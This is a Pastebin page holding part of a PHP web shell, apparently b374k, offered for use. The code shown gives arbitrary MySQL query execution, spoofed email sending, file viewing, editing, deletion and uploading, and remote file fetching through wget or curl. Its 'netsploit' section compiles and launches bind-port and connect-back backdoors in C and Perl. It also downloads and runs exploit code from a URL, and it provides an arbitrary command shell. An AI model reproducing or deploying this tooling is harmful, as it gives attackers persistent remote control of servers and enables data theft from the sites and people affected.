  655.             $msgq  = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  656.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  657.             <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  658.             <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  659.             <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  660.             <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  661.             <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  662.             <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  663.             <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  664.             <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  665.             <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  666.             </form></div>
  667.             ";
  668.             $columns = array();
  669.             $msg = "<table class=\"explore\" style=\"width:99%;\">";
  670.             $hasil = @mysql_query("SHOW FIELDS FROM ".$db.".".$table);     
  671.             while(list($column) = @mysql_fetch_row($hasil)){
  672.                 $msg .= "<th>$column</th>";
  673.                 $kolum = $column;
  674.             }
  675.             $msg .= "</tr>";
  676.             $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table);
  677.             list($total) = mysql_fetch_row($hasil);    
  678.             if(isset($_GET['z'])) $page = (int) $_GET['z'];
  679.             else $page = 1;
  680.             $pagenum = 100;
  681.             $totpage = ceil($total / $pagenum);
  682.             $start = (($page - 1) * $pagenum);         
  683.             $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum);
  684.             while($datas = @mysql_fetch_assoc($hasil)){
  685.                 $msg .= "<tr>";
  686.                 foreach($datas as $data){
  687.                     if(trim($data) == "") $data = "&nbsp;";
  688.                     $msg .= "<td>$data</td>";
  689.                 }
  690.                 $msg .= "</tr>";
  691.             }
  692.             $msg .= "</table>";
  693.            
  694.            
  695.             $head = "<div style=\"padding:10px 0 0 6px;\">
  696.             <form action=\"?\" method=\"get\">
  697.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  698.             <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  699.             <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  700.             <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  701.             <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  702.             <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  703.             <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  704.             <input type=\"hidden\" name=\"table\" value=\"".$table."\" />
  705.             Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">";
  706.             for($i = 1;$i <= $totpage;$i++){
  707.                 $head .= "<option value=\"".$i."\">".$i."</option>";
  708.                 if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>";
  709.             }
  710.             $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>";
  711.             $msg = $msgq.$head.$msg;
  712.         }
  713.         elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){
  714.             $db = $_GET['db'];
  715.             $query = magicboom($_GET['sqlquery']);
  716.             $msg  = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  717.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  718.             <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  719.             <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  720.             <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  721.             <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  722.             <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  723.             <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  724.             <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  725.             <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  726.             </form></div>
  727.             ";
  728.             @mysql_select_db($db);
  729.             $querys = explode(";",$query);
  730.             foreach($querys as $query){
  731.               if(trim($query) != ""){
  732.                 $hasil = mysql_query($query);
  733.                 if($hasil){
  734.                     $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>";
  735.                     $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>";
  736.                     for($i=0;$i<@mysql_num_fields($hasil);$i++)
  737.                         $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>";
  738.                     $msg .= "</tr>";
  739.                     for($i=0;$i<@mysql_num_rows($hasil);$i++)
  740.                     {
  741.                         $rows=@mysql_fetch_array($hasil);
  742.                         $msg .= "<tr>";
  743.                         for($j=0;$j<@mysql_num_fields($hasil);$j++)
  744.                         {
  745.                             if($rows[$j] == "") $dataz = "&nbsp;";
  746.                             else $dataz = $rows[$j];
  747.                             $msg .= "<td>".$dataz."</td>";
  748.                         }
  749.                         $msg .= "</tr>";
  750.                     }
  751.                     $msg .= "</table>";
  752.                 }
  753.                 else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>";       
  754.               }
  755.             }
  756.         }
  757.         else {
  758.             $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;";
  759.             $msg  = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\">
  760.             <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" />
  761.             <input type=\"hidden\" name=\"x\" value=\"mysql\" />
  762.             <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" />
  763.             <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" />
  764.             <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" />
  765.             <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" />
  766.             <input type=\"hidden\" name=\"db\" value=\"".$db."\" />
  767.             <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p>
  768.             <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p>
  769.             </form></div>
  770.             ";
  771.             // show available database
  772.             $dbs = array();
  773.             $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>";
  774.             $hasil = @mysql_list_dbs($con);    
  775.             while(list($db) = @mysql_fetch_row($hasil)){
  776.                 @array_push($dbs,$db);
  777.             }
  778.             @sort($dbs);   
  779.             foreach($dbs as $db){
  780.                 $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>";
  781.             }
  782.             $msg .= "</table>";
  783.         }
  784.         @mysql_close($con);
  785.     }
  786.     else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>";
  787.  
  788.  
  789.     echo $msg;
  790. }
  791. else{
  792. ?>
  793. <form action="?" method="get">
  794. <input type="hidden" name="y" value="<?php echo $pwd; ?>" />
  795. <input type="hidden" name="x" value="mysql" />
  796. <table class="tabnet" style="width:300px;">
  797. <tr><th colspan="2">Connect to mySQL server</th></tr>
  798. <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr>
  799. <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr>
  800. <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr>
  801. <tr><td>&nbsp;&nbsp;Port</td><td><input  style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr>
  802. </table>
  803. </form>
  804. <?php }}
  805. elseif(isset($_GET['x']) && ($_GET['x'] == 'mail')){
  806. if(isset($_POST['mail_send'])){
  807.     $mail_to = $_POST['mail_to'];
  808.     $mail_from = $_POST['mail_from'];
  809.     $mail_subject = $_POST['mail_subject'];
  810.     $mail_content = magicboom($_POST['mail_content']);
  811.     if(@mail($mail_to,$mail_subject,$mail_content,"FROM:$mail_from")){
  812.         $msg = "email sent to $mail_to";
  813.     }
  814.     else $msg = "send email failed";
  815. }
  816. ?>
  817. <form action="?y=<?php echo $pwd; ?>&amp;x=mail" method="post">
  818. <table class="cmdbox">
  819. <tr><td>
  820. <textarea class="output" name="mail_content" id="cmd" style="height:340px;">Hey there, please patch me ASAP ;-p</textarea>
  821. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="admin@somesome.com" name="mail_to" />&nbsp; mail to</td></tr>
  822. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="b374k@fbi.gov" name="mail_from" />&nbsp; from</td></tr>
  823. <tr><td>&nbsp;<input class="inputz" style="width:20%;" type="text" value="patch me" name="mail_subject" />&nbsp; subject</td></tr>
  824. <tr><td>&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="mail_send" /></td></tr></form>
  825. <tr><td>&nbsp;&nbsp;&nbsp;&nbsp;<?php echo $msg; ?></td></tr>
  826. </table>
  827. </form>
  828.  
  829. <?php }
  830.  
  831.  
  832. elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){
  833.     @ob_start();
  834.     @eval("phpinfo();");
  835.     $buff = @ob_get_contents();
  836.     @ob_end_clean();   
  837.     $awal = strpos($buff,"<body>")+6;
  838.     $akhir = strpos($buff,"</body>");
  839.     echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>";
  840. }
  841. elseif(isset($_GET['view']) && ($_GET['view'] != "")){
  842.   if(is_file($_GET['view'])){
  843.     if(!isset($file)) $file = magicboom($_GET['view']);
  844.     if(!$win && $posix){
  845.         $name=@posix_getpwuid(@fileowner($folder));
  846.         $group=@posix_getgrgid(@filegroup($folder));
  847.         $owner = $name['name']."<span class=\"gaya\"> : </span>".$group['name'];
  848.     }
  849.     else {
  850.         $owner = $user;
  851.     }
  852.     $filn = basename($file);
  853.     echo "<table style=\"margin:6px 0 0 2px;line-height:20px;\">
  854.     <tr><td>Filename</td><td><span id=\"".clearspace($filn)."_link\">".$file."</span>
  855.     <form action=\"?y=".$pwd."&amp;view=$file\" method=\"post\" id=\"".clearspace($filn)."_form\" class=\"sembunyi\" style=\"margin:0;padding:0;\">
  856.         <input type=\"hidden\" name=\"oldname\" value=\"".$filn."\" style=\"margin:0;padding:0;\" />
  857.         <input class=\"inputz\" style=\"width:200px;\" type=\"text\" name=\"newname\" value=\"".$filn."\" />
  858.         <input class=\"inputzbut\" type=\"submit\" name=\"rename\" value=\"rename\" />
  859.         <input class=\"inputzbut\" type=\"submit\" name=\"cancel\" value=\"cancel\" onclick=\"tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\" />
  860.     </form>
  861.     </td></tr>
  862.     <tr><td>Size</td><td>".ukuran($file)."</td></tr>
  863.     <tr><td>Permission</td><td>".get_perms($file)."</td></tr>
  864.     <tr><td>Owner</td><td>".$owner."</td></tr>
  865.     <tr><td>Create time</td><td>".date("d-M-Y H:i",@filectime($file))."</td></tr>
  866.     <tr><td>Last modified</td><td>".date("d-M-Y H:i",@filemtime($file))."</td></tr>
  867.     <tr><td>Last accessed</td><td>".date("d-M-Y H:i",@fileatime($file))."</td></tr>
  868.     <tr><td>Actions</td><td><a href=\"?y=$pwd&amp;edit=$file\">edit</a> | <a href=\"javascript:tukar('".clearspace($filn)."_link','".clearspace($filn)."_form');\">rename</a> | <a href=\"?y=$pwd&amp;delete=$file\">delete</a> | <a href=\"?y=$pwd&amp;dl=$file\">download</a>&nbsp;(<a href=\"?y=$pwd&amp;dlgzip=$file\">gzip</a>)</td></tr>
  869.     <tr><td>View</td><td><a href=\"?y=".$pwd."&amp;view=".$file."\">text</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=code\">code</a> | <a href=\"?y=".$pwd."&amp;view=".$file."&amp;type=image\">image</a></td></tr>
  870.     </table>
  871.     ";
  872.     if(isset($_GET['type']) && ($_GET['type']=='image')){
  873.         echo "<div style=\"text-align:center;margin:8px;\"><img src=\"?y=".$pwd."&amp;img=".$filn."\"></div>";
  874.     }
  875.     elseif(isset($_GET['type']) && ($_GET['type']=='code')){
  876.         echo "<div class=\"viewfile\">";
  877.         $file = wordwrap(@file_get_contents($file),"240","\n");
  878.         @highlight_string($file);
  879.         echo "</div>";
  880.     }
  881.     else {
  882.         echo "<div class=\"viewfile\">";
  883.         echo nl2br(htmlentities((@file_get_contents($file))));
  884.         echo "</div>";
  885.     }
  886.   }
  887.   elseif(is_dir($_GET['view'])){
  888.         echo showdir($pwd,$prompt);
  889.   }
  890.    
  891. }
  892. elseif(isset($_GET['edit']) && ($_GET['edit'] != "")){
  893.  
  894.         if(isset($_POST['save'])){
  895.             $file = $_POST['saveas'];
  896.             $content = magicboom($_POST['content']);
  897.             if($filez = @fopen($file,"w")){
  898.                 $time = date("d-M-Y H:i",time());
  899.                 if(@fwrite($filez,$content)) $msg = "file saved <span class=\"gaya\">@</span> ".$time;
  900.                 else $msg = "failed to save";
  901.                 @fclose($filez);
  902.             }
  903.             else $msg = "permission denied";
  904.         }
  905.         if(!isset($file)) $file = $_GET['edit'];
  906.         if($filez = @fopen($file,"r")){
  907.             $content = "";
  908.             while(!feof($filez)){
  909.                 $content .= htmlentities(str_replace("''","'",fgets($filez)));
  910.             }
  911.             @fclose($filez);
  912.         }
  913.    
  914. ?>
  915. <form action="?y=<?php echo $pwd; ?>&amp;edit=<?php echo $file; ?>" method="post">
  916. <table class="cmdbox">
  917. <tr><td colspan="2">
  918. <textarea class="output" name="content">
  919. <?php echo $content; ?>
  920. </textarea>
  921. <tr><td colspan="2">Save as <input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="saveas" style="width:60%;" value="<?php echo $file; ?>" /><input class="inputzbut" type="submit" value="Save !" name="save" style="width:12%;" />
  922. &nbsp;<?php echo $msg; ?></td></tr>
  923. </table>
  924. </form>
  925. <?php
  926. }
  927. elseif(isset($_GET['x']) && ($_GET['x'] == 'upload')){
  928. if(isset($_POST['uploadcomp'])){
  929.     if(is_uploaded_file($_FILES['file']['tmp_name'])){
  930.         $path = magicboom($_POST['path']);
  931.         $fname = $_FILES['file']['name'];
  932.         $tmp_name = $_FILES['file']['tmp_name'];
  933.         $pindah = $path.$fname;
  934.         $stat = @move_uploaded_file($tmp_name,$pindah);    
  935.         if ($stat) {
  936.             $msg = "file uploaded to $pindah";
  937.         }
  938.         else $msg = "failed to upload $fname";
  939.     }
  940.     else $msg = "failed to upload $fname";
  941. }
  942. elseif(isset($_POST['uploadurl'])){
  943.     $pilihan = trim($_POST['pilihan']);
  944.     $wurl = trim($_POST['wurl']);
  945.     $path = magicboom($_POST['path']);
  946.     $namafile = download($pilihan,$wurl);
  947.     $pindah = $path.$namafile;
  948.     if(is_file($pindah)) {
  949.         $msg = "file uploaded to $pindah";
  950.     }
  951.     else $msg = "failed to upload $namafile";
  952.  
  953. }
  954. ?>
  955. <form action="?y=<?php echo $pwd; ?>&amp;x=upload" enctype="multipart/form-data" method="post">
  956. <table class="tabnet" style="width:320px;padding:0 1px;">
  957. <tr><th colspan="2">Upload from computer</th></tr>
  958. <tr><td colspan="2"><p style="text-align:center;"><input style="color:#000000;" type="file" name="file" /><input type="submit" name="uploadcomp" class="inputzbut" value="Go" style="width:80px;"></p></td>
  959. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  960. </tr>
  961. </table></form>
  962. <table class="tabnet" style="width:320px;padding:0 1px;">
  963. <tr><th colspan="2">Upload from url</th></tr>
  964. <tr><td colspan="2"><form method="post" style="margin:0;padding:0;" actions="?y=<?php echo $pwd; ?>&amp;x=upload">
  965. <table><tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="http://www.some-code/exploits.c"></td></tr>
  966. <tr><td colspan="2"><input type="text" class="inputz" style="width:99%;" name="path" value="<?php echo $pwd; ?>" /></td></tr>
  967. <tr><td><select size="1" class="inputz" name="pilihan">
  968. <option value="wwget">wget</option>
  969. <option value="wlynx">lynx</option>
  970. <option value="wfread">fread</option>
  971. <option value="wfetch">fetch</option>
  972. <option value="wlinks">links</option>
  973. <option value="wget">GET</option>
  974. <option value="wcurl">curl</option>
  975. </select></td><td colspan="2"><input type="submit" name="uploadurl" class="inputzbut" value="Go" style="width:246px;"></td></tr></form></table></td>
  976. </tr>
  977. </table>
  978. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  979. <?php }
  980. elseif(isset($_GET['x']) && ($_GET['x'] == 'netsploit')){
  981.  
  982. // bind connect with c
  983. if (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'C')) {
  984.     $port = trim($_POST['port']);
  985.     $passwrd = trim($_POST['bind_pass']);
  986.     tulis("bdc.c",$port_bind_bd_c);
  987.     exe("gcc -o bdc bdc.c");
  988.     exe("chmod 777 bdc");
  989.     @unlink("bdc.c");
  990.     exe("./bdc ".$port." ".$passwrd." &");
  991.     $scan = exe("ps aux");
  992.     if(eregi("./bdc $por",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  993.     else { $msg =  "<p>Process not found running, backdoor not setup successfully.</p>"; }
  994. }
  995. // bind connect with perl
  996. elseif (isset($_POST['bind']) && !empty($_POST['port']) && !empty($_POST['bind_pass']) && ($_POST['use'] == 'Perl')) {
  997.     $port = trim($_POST['port']);
  998.     $passwrd = trim($_POST['bind_pass']);
  999.     tulis("bdp",$port_bind_bd_pl);
  1000.     exe("chmod 777 bdp");
  1001.     $p2=which("perl");
  1002.     exe($p2." bdp ".$port." &");
  1003.     $scan = exe("ps aux");
  1004.     if(eregi("$p2 bdp $port",$scan)){ $msg = "<p>Process found running, backdoor setup successfully.</p>"; }
  1005.     else { $msg = "<p>Process not found running, backdoor not setup successfully.</p>"; }
  1006. }
  1007. // back connect with c
  1008. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'C')) {
  1009.     $ip = trim($_POST['ip']);
  1010.     $port = trim($_POST['backport']);
  1011.     tulis("bcc.c",$back_connect_c);
  1012.     exe("gcc -o bcc bcc.c");
  1013.     exe("chmod 777 bcc");
  1014.     @unlink("bcc.c");
  1015.     exe("./bcc ".$ip." ".$port." &");
  1016.     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1017. }
  1018. // back connect with perl
  1019. elseif (isset($_POST['backconn']) && !empty($_POST['backport']) && !empty($_POST['ip']) && ($_POST['use'] == 'Perl')) {
  1020.     $ip = trim($_POST['ip']);
  1021.     $port = trim($_POST['backport']);
  1022.     tulis("bcp",$back_connect);
  1023.     exe("chmod +x bcp");
  1024.     $p2=which("perl");
  1025.     exe($p2." bcp ".$ip." ".$port." &");
  1026.     $msg = "Now script try connect to ".$ip." port ".$port." ...";
  1027. }
  1028. elseif (isset($_POST['expcompile']) && !empty($_POST['wurl']) && !empty($_POST['wcmd']))
  1029. {
  1030.     $pilihan = trim($_POST['pilihan']);
  1031.     $wurl = trim($_POST['wurl']);
  1032.     $namafile = download($pilihan,$wurl);
  1033.     if(is_file($namafile)) {
  1034.    
  1035.     $msg = exe($wcmd);
  1036.     }
  1037.     else $msg = "error: file not found $namafile";
  1038. }
  1039.  
  1040. ?>
  1041. <table class="tabnet">
  1042. <tr><th>Port Binding</th><th>Connect Back</th><th>Load and Exploit</th></tr>
  1043. <tr>
  1044. <td>
  1045. <table>
  1046. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1047. <tr><td>Port</td><td><input class="inputz" type="text" name="port" size="26" value="<?php echo $bindport ?>"></td></tr>
  1048. <tr><td>Password</td><td><input class="inputz" type="text" name="bind_pass" size="26" value="<?php echo $bindport_pass; ?>"></td></tr>
  1049. <tr><td>Use</td><td style="text-align:justify"><p><select class="inputz" size="1" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  1050. <input class="inputzbut" type="submit" name="bind" value="Bind" style="width:120px"></td></tr></form>
  1051. </table>
  1052. </td>
  1053. <td>
  1054. <table>
  1055. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1056. <tr><td>IP</td><td><input class="inputz" type="text" name="ip" size="26" value="<?php echo ((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1")); ?>"></td></tr>
  1057. <tr><td>Port</td><td><input class="inputz" type="text" name="backport" size="26" value="<?php echo $bindport; ?>"></td></tr>
  1058. <tr><td>Use</td><td style="text-align:justify"><p><select size="1" class="inputz" name="use"><option value="Perl">Perl</option><option value="C">C</option></select>
  1059. <input type="submit" name="backconn" value="Connect" class="inputzbut" style="width:120px"></td></tr></form>
  1060. </table>
  1061. </td>
  1062. <td>
  1063. <table>
  1064. <form method="post" actions="?y=<?php echo $pwd; ?>&amp;x=netsploit">
  1065. <tr><td>url</td><td><input class="inputz" type="text" name="wurl" style="width:250px;" value="www.some-code/exploits.c"></td></tr>
  1066. <tr><td>cmd</td><td><input class="inputz" type="text" name="wcmd" style="width:250px;" value="gcc -o exploits exploits.c;chmod +x exploits;./exploits;"></td>
  1067. </tr>
  1068. <tr><td><select size="1" class="inputz" name="pilihan">
  1069. <option value="wwget">wget</option>
  1070. <option value="wlynx">lynx</option>
  1071. <option value="wfread">fread</option>
  1072. <option value="wfetch">fetch</option>
  1073. <option value="wlinks">links</option>
  1074. <option value="wget">GET</option>
  1075. <option value="wcurl">curl</option>
  1076. </select></td><td colspan="2"><input type="submit" name="expcompile" class="inputzbut" value="Go" style="width:246px;"></td></tr></form>
  1077. </table>
  1078. </td>
  1079. </tr>
  1080. </table>
  1081. <div style="text-align:center;margin:2px;"><?php echo $msg; ?></div>
  1082. <?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'shell')){  ?>
  1083. <form action="?y=<?php echo $pwd; ?>&amp;x=shell" method="post">
  1084. <table class="cmdbox">
  1085. <tr><td colspan="2">
  1086. <textarea class="output" readonly>
  1087. <?php
  1088. if(isset($_POST['submitcmd'])) {
  1089.     echo @exe($_POST['cmd']);
  1090. }
  1091. ?>
  1092. </textarea>
  1093. <tr><td colspan="2"><?php echo $prompt; ?><input onMouseOver="this.focus();" id="cmd" class="inputz" type="text" name="cmd" style="width:60%;" value="" /><input class="inputzbut" type="submit" value="Go !" name="submitcmd" style="width:12%;" /></td></tr>
  1094. </table>
  1095. </form>
  1096. <?php }
  1097. else {
  1098. if(isset($_GET['delete']) && ($_GET['delete'] != "")){
  1099.     $file = $_GET['delete'];
  1100.     @unlink($file);
  1101. }
  1102. elseif(isset($_GET['fdelete']) && ($_GET['fdelete'] != "")){
  1103.     @rmdir(rtrim($_GET['fdelete'],DIRECTORY_SEPARATOR));
  1104. }
  1105. elseif(isset($_GET['mkdir']) && ($_GET['mkdir'] != "")){
  1106.     $path = $pwd.$_GET['mkdir'];
  1107.     @mkdir($path);
  1108. }
  1109.     $buff = showdir($pwd,$prompt);
  1110.     echo $buff;
  1111. }
  1112. ?>
  1113. </div>
  1114. </body>
  1115. </html>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!